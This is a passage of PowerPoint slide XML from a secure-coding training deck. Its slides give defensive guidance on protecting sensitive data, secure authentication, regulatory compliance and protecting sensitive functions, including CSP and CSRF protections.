        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Case Study: Cross-Site Scripting Defect (Slide 6 of 6)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1283813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88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1904999" y="1302040"/>
            <a:ext cx="6897075" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>As you design your software:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Identify all sensitive data your software will come into contact with.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Consider how it flows through your system when you perform your threat model analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Include all hosts involved in transactions (e.g., various servers and web, mobile, and desktop clients) and network devices (e.g., firewalls, routers).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Design the system to provide appropriate protections at every vulnerable point.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>As you design the user interface:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Consider where you can provide protections, such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Clearing data displayed in forms after the application has been idle for a period of time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Preventing printing or screen shots if appropriate.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Sensitive Data (Slide 1 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="341925" y="1297124"/>
            <a:ext cx="1480513" cy="1852687"/>
            <a:chOff x="178051" y="1524000"/>
            <a:chExt cx="1480513" cy="1852687"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1028" name="Picture 4" descr="Image result for data fold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51" y="1524000"/>
              <a:ext cx="1480513" cy="1335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10" y="2157487"/>
              <a:ext cx="821267" cy="121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Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD508421-0F90-470E-9A75-6D778703C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079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89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1904999" y="1302040"/>
            <a:ext cx="6897075" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>As you review code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Consider all locations where sensitive data might exist at any point in time, such as:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Function and method parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>POST and GET parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>User interface components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Temporary files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Memory caches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Provide appropriate protections at all data-handling points.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Sensitive Data (Slide 2 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="341925" y="1297124"/>
            <a:ext cx="1480513" cy="1852687"/>
            <a:chOff x="178051" y="1524000"/>
            <a:chExt cx="1480513" cy="1852687"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1028" name="Picture 4" descr="Image result for data fold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51" y="1524000"/>
              <a:ext cx="1480513" cy="1335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10" y="2157487"/>
              <a:ext cx="821267" cy="121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Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD508421-0F90-470E-9A75-6D778703C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5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EF8A-4F67-48D1-93A9-9EAE4B33C5C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provide Secure Authentication (Slide 1 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E81160B3-EA6C-4B42-B3A8-52B6D2EAC155}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1219200"/>
            <a:ext cx="6897076" cy="5023338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require authentication for pages and resources not meant to be public.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reauthenticate users prior to performing critical operations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authenticate all connections to external systems involving sensitive information or functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enforce all authentication controls on a trusted system, such as a server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use standard, tested authentication services whenever possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If using third-party code for authentication, inspect the code carefully to ensure it does not contain malicious code.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{455C2136-BD2C-406B-933C-8C4456CFF75E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{030C9899-0690-47AE-AE44-D1CC23715785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-9832" y="1160208"/>
            <a:ext cx="1991032" cy="1151641"/>
            <a:chOff x="-2445" y="3873609"/>
            <a:chExt cx="2031700" cy="1175164"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70D4C1E2-8AD8-4229-97B5-989671C9D393}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="4500000">
              <a:off x="482986" y="3502504"/>
              <a:ext cx="1175164" cy="1917374"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rounded Rectangle 135">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E2CD111-947E-47B7-898D-D885888ED226}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20723103">
              <a:off x="-2445" y="4363017"/>
              <a:ext cx="1371600" cy="235675"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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ea typeface="+mn-ea"/>
                  <a:cs typeface="Calibri"/>
                </a:rPr>
                <a:t>Authentication</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9AFDECD-AC61-46D8-BDF0-F7404FC5E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670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90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1904999" y="1302040"/>
            <a:ext cx="6897075" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Pay particular attention to personally identifying information (PII, such as Social Security numbers, credit card or financial information, and other sensitive data) which can be useful to thieves for committing fraud and identity theft.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Don't collect any sensitive data you don't have to collect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Don't retain any sensitive data you don't have to retain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Protect any sensitive data that you retain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If you protect sensitive data through encryption, make sure that you are using strong encryption, and using it correctly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If you are required to retain data but you don't need to know who the data is associated with, then don't retain any identifying information, essentially anonymizing the data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Sensitive Data (Slide 3 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="341925" y="1297124"/>
            <a:ext cx="1480513" cy="1852687"/>
            <a:chOff x="178051" y="1524000"/>
            <a:chExt cx="1480513" cy="1852687"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1028" name="Picture 4" descr="Image result for data fold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51" y="1524000"/>
              <a:ext cx="1480513" cy="1335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10" y="2157487"/>
              <a:ext cx="821267" cy="121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Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B19E5C4-DB89-4C75-A214-2FA13DDD9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284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91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1904999" y="1302040"/>
            <a:ext cx="6897075" cy="4920960"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Make sure you adhere to any compliance regulations that apply to your situation. Statutes such as the following provide requirements on how you must protect sensitive financial, medical, and personal information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Payment Card Industry Data Security Standards (PCI DSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>European Union Data Directive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>United States HIPAA and HITECH ACT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>United Kingdom Criminal Justice and Immigration Act</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Gramm-Leach-Bliley Act</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Federal Trade Commission Act</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Fair Credit Reporting Act</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Sensitive Data (Slide 4 of 4)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="341925" y="1297124"/>
            <a:ext cx="1480513" cy="1852687"/>
            <a:chOff x="178051" y="1524000"/>
            <a:chExt cx="1480513" cy="1852687"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1028" name="Picture 4" descr="Image result for data fold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51" y="1524000"/>
              <a:ext cx="1480513" cy="1335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10" y="2157487"/>
              <a:ext cx="821267" cy="121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Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AADFD561-51FF-4714-AF05-5D5C2FB8B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569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binary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 y="1169603"/>
            <a:ext cx="1522016" cy="152201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Protect Sensitive Functions (Slide 1 of 3) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1307130"/>
            <a:ext cx="6897076" cy="4935408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use authentication and authorization controls to ensure that callers have required permissions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To allow only callers from a particular organization or site to call the protected code, require that callers provide a digital signature.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use features of the programming language (e.g., public, private, protected) to limit access and visibility of methods and functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Every method, field, or class that is not private adds to the attack surface, so don't make them public unless necessary.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8"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hecklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BA29C3E-4B3B-44B3-93B5-6A69437B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649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binary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 y="1169603"/>
            <a:ext cx="1522016" cy="152201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Protect Sensitive Functions (Slide 2 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1307130"/>
            <a:ext cx="6897076" cy="4935408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand how scope and structure of your code translates to executable code or bytecode, and the impact on the accessibility of functions. For example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When translated into bytecode, Java inner classes are implemented as external classes in the same package.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any class in the package can then access the inner class.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The outer class’ private fields are accessible by the now external inner class.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make classes extensible only when there is a good reason to do so. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can use features of the programming language (e.g., using the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Final keyword in Java) to prevent classes from being extended. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A non-final class might enable an attacker to extend a class to change its behavior for malicious purposes.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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8"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hecklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BA29C3E-4B3B-44B3-93B5-6A69437B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09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binary fil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 y="1169603"/>
            <a:ext cx="1522016" cy="152201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Protect Sensitive Functions (Slide 3 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1307130"/>
            <a:ext cx="6897076" cy="4935408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>In web applications, consider using Content Security Policy (CSP) headers to help prevent code injection attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>In web applications, employ appropriate protections against cross site request forgery (CSRF) attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>When you provide APIs for third-party developers, ensure they are used safely.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Employ thorough design and testing, and monitor usage logs to ensure your APIs remain secure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Provide third-party developers with clearly written API documentation, including security guidelines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Make sure third-party developers abide by your usage rules—for example, spelling out security requirements in procurement contracts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0"/>
              <a:t>Maintain your hosting resources to remediate any new vulnerabilities as they become known.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
